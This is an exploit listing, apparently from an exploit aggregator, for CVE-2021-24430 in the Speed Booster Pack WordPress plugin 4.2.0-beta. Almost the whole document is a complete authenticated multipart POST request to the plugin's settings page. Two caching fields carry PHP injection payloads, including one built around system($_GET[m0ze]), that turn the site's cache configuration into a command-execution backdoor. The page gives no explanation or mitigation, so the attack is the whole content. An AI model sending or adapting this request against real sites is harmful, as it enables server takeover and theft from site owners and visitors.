Exploit for Speed Booster Pack 4.2.0-beta - Authenticated (admin+) RCE CVE-2021-24430

Name: Exploit for Speed Booster Pack 4.2.0-beta - Authenticated (admin+) RCE CVE-2021-24430
Rating: 5 (78 reviews)
2021-07-05 | CVSS 6.5
## https://sploitus.com/exploit?id=WPEX-ID:945D6D2E-FA25-42C0-A7B4-B1794732A0DF
PoC | Authenticated RCE | Caching > Exclude URLs / Cached query strings:

POST /wp-admin/admin.php?page=sbp-settings HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------302485341940537720723165689794
Content-Length: 12229

-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_transient[section]"

2
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_options_noncesbp_options"

29dd57f6e3
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=sbp-settings
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_caching]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_expiry]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_separate_mobile]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_warmup_after_clear]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_exclude_urls]"

' );}`$_GET[m0ze]`;/*
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_exclude_cookies]"

m0ze
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_include_query_strings]"

' );}system($_GET[m0ze]);/*
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_url]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_includes]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_excludes]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_api]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_email]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_zone]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_rocket_loader_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_dev_mode_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_css_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_html_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_js_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_apo_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_apo_device_type]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_browser_cache_ttl]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_api]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_secret]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_css]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[enable_criticalcss]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_default]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_front_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_home]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_single]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_category]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_tag]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_archive]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[remove_criticalcss]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_inline]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_minify]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_exclude]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_assets]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[minify_html]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[optimize_gfonts]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[lazyload]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[lazyload_exclude]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_optimize]"

off
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_exclude]"

js/jquery/jquery.js
js/jquery/jquery.min.js
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_include]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[move_to_footer]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[move_to_footer_exclude]"

js/jquery/jquery.js
js/jquery/jquery.min.js
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[preboost][preboost_enable]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[preboost][preboost_include]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_special]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[localize_tracking_scripts]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_item]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_place]"

footer
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_method]"

normal
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[jetpack_dequeue_devicepx]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_disable_cart_fragments]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_optimize_nonwc_pages]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_disable_password_meter]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[pagespeed_tricker]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_tweaks]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[instant_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[trim_query_strings]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[disable_self_pingbacks]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_emoji_scripts]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[disable_post_embeds]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_dashicons]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_block_library]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[heartbeat_settings]"

enabled
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[post_revisions]"

99
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[autosave_interval]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_comment_reply_script]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_shortlinks]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_adjacent_posts_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wlw]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rsd]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rest_api_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_feed_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wp_version]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_import_data"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[enable_external_notices]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_transient[save]"

Saving...
-----------------------------302485341940537720723165689794--